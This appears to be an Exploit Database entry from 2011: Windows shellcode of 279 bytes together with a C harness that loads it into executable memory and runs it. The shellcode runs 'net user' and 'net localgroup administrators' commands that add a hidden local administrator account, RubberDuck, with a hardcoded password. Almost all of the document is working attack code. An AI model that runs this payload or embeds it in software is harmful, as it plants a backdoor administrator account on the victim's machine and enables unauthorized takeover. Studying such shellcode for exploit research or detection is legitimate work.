Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)

EDB-ID:

17323

CVE:

N/A




Platform:

Windows

Date:

2011-05-25


/*
Title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 279 bytes
Date: 2011-05-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
 -- command: cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add
 -- Username: RubberDuck
 -- Password: mudbath
*/

#include <stdio.h>
#include <windows.h>
 
int main(){
  unsigned char shellcode[]=
    "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
    "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
    "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
    "\xFF\xD2\x6A\x05\xEB\x23\xFF\xD0\x68\x65"
    "\x73\x73\x01\x8B\xDF\xFE\x4C\x24\x03\x68"
    "\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54"
    "\xFF\x74\x24\x1C\xFF\x54\x24\x1C\x57\xFF"
    "\xD0\xE8\xD8\xFF\xFF\xFF\x63\x6D\x64\x2E"
    "\x65\x78\x65\x20\x2F\x63\x20\x6E\x65\x74"
    "\x20\x75\x73\x65\x72\x20\x52\x75\x62\x62"
    "\x65\x72\x44\x75\x63\x6B\x20\x6D\x75\x64"
    "\x62\x61\x74\x68\x20\x2F\x61\x64\x64\x20"
    "\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63"
    "\x61\x6C\x67\x72\x6F\x75\x70\x20\x61\x64"
    "\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F"
    "\x72\x73\x20\x52\x75\x62\x62\x65\x72\x44"
    "\x75\x63\x6B\x20\x2F\x61\x64\x64\x00";
  LPVOID lpAlloc;
  void (*pfunc)();
 
  printf("size = %i bytes\n", lstrlen(shellcode) + 1);
  printf("-------------------------\nUsername: RubberDuck\nPassword: mudbath\n");
  system("PAUSE");
 
  lpAlloc = VirtualAlloc(0, 4096,
                         MEM_COMMIT,
                         PAGE_EXECUTE_READWRITE);
 
  if(lpAlloc == NULL){
    printf("Memory not allocated!\n");
    return 0;
  }
 
  memcpy(lpAlloc, shellcode, lstrlen(shellcode) + 1);
 
  pfunc = lpAlloc;
 
  pfunc();
 
  return 0;
}